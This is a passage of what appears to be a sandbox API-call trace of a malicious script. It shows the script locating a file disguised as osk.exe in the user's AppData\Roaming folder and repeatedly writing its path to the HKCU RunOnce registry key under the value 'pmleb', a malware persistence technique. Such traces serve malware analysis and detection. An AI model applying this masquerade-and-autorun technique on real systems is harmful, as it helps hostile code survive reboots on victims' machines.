varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.769] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.769] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.770] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0079.770] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.770] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x51 [0079.770] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.770] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0079.770] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.770] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.771] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.771] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.771] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0079.771] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.771] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.771] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.771] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.771] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.771] RegCloseKey (hKey=0x280) returned 0x0 [0079.771] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.771] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.772] SetTimer (hWnd=0x20280, nIDEvent=0x2050, uElapse=0xa, lpTimerFunc=0x0) returned 0x2050 [0079.772] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.784] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.784] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.784] KillTimer (hWnd=0x20280, uIDEvent=0x2050) returned 1 [0079.784] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.784] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.785] IUnknown:Release (This=0x787518) returned 0x1 [0079.785] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.785] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.785] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.785] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.785] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0079.785] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.785] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x52 [0079.785] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.786] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0079.786] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.786] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.786] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.786] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.786] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.786] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.787] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.787] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.787] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.787] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0079.787] RegCloseKey (hKey=0x280) returned 0x0 [0079.787] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.787] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.787] SetTimer (hWnd=0x20280, nIDEvent=0x2051, uElapse=0xa, lpTimerFunc=0x0) returned 0x2051 [0079.787] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.799] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.799] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.800] KillTimer (hWnd=0x20280, uIDEvent=0x2051) returned 1 [0079.800] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.800] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.800] IUnknown:Release (This=0x787518) returned 0x1 [0079.800] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.800] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.800] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.800] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.800] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.801] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.801] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 
[0079.801] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.801] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x53 [0079.801] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.802] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x52 [0079.802] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.802] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.802] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.802] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.802] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.802] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.802] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.802] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.802] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.802] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.802] RegCloseKey (hKey=0x280) returned 0x0 [0079.802] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.803] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.803] SetTimer (hWnd=0x20280, nIDEvent=0x2052, uElapse=0xa, lpTimerFunc=0x0) returned 0x2052 [0079.803] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.815] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.815] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.815] KillTimer (hWnd=0x20280, uIDEvent=0x2052) returned 1 [0079.815] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.815] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.816] IUnknown:Release (This=0x787518) returned 0x1 [0079.816] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 